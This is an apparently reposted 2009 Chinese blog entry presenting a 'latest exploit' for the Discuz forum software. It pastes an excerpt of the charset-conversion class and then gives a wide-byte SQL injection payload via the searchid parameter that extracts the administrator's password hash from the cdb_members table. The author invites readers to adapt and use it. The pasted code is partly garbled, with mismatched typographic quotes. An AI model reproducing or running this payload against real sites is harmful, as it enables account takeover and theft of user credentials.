首页 网络安全 安全学院 查看内容

discuz最新漏洞利用程序

2009-2-4 07:52 764 0

摘要: 由于发在blog上的漏洞资料给一位牛牛搞了.官方已出补丁.(由于 PHP 对 多字节字符集的支持存在问题,在各种编码相互转换过程中,有可能引发程序溢出和程序错误)我很生气(mb日就日.tmd你共享个毛...
关键词: LangCode TargetLang table SourceLang return substr function unicode UTF-8 config

由于发在blog上的漏洞资料给一位牛牛搞了.官方已出补丁.(由于 PHP 对 多字节字符集的支持存在问题,在各种编码相互转换过程中,有可能引发程序溢出和程序错误)我很生气(mb日就日.tmd你共享个毛) 在这我说下过程:if(defined('IN_DISCUZ')) {exit('Access Denied');} define('CODETABLE_DIR', DISCUZ_ROOT.'./include/tables/'); class Chinese { var $table = '';var $iconv_enabled = false;var $unicode_table = array();var $config = array('SourceLang' => '','TargetLang' => '','GBtoUnicode_table' => 'gb-unicode.table','BIG5toUnicode_table' => 'big5-unicode.table',); function Chinese($SourceLang, $TargetLang, $ForceTable = FALSE) {$this->config['SourceLang'] = $this->_lang($SourceLang);$this->config['TargetLang'] = $this->_lang($TargetLang); if(!function_exists(’iconv’) && $this->config['TargetLang'] != ‘BIG5′ && !$ForceTable) {$this->iconv_enabled = true;} else {$this->iconv_enabled = false;$this->OpenTable();}} function _lang($LangCode) {$LangCode = strtoupper($LangCode); if(substr($LangCode, 0, 2) == ‘GB’) {return ‘GBK’;} elseif(substr($LangCode, 0, 3) == ‘BIG’) {return ‘BIG5′;} elseif(substr($LangCode, 0, 3) == ‘UTF’) {return ‘UTF-8′;} elseif(substr($LangCode, 0, 3) == ‘UNI’) {return ‘UNICODE’;}} function _hex2bin($hexdata) {for($i=0; $i < strlen($hexdata); $i += 2) {$bindata .= chr(hexdec(substr($hexdata, $i, 2)));}return $bindata;} chinese.class.php (utf-8不能利用) searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=1/*&do=submit 以上各位自己修改去用吧! af5262ea 本篇文章来源于 xixi's blog:http://www.wairi.cn 原文链接:http://www.wairi.cn/article.asp?id=2778
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部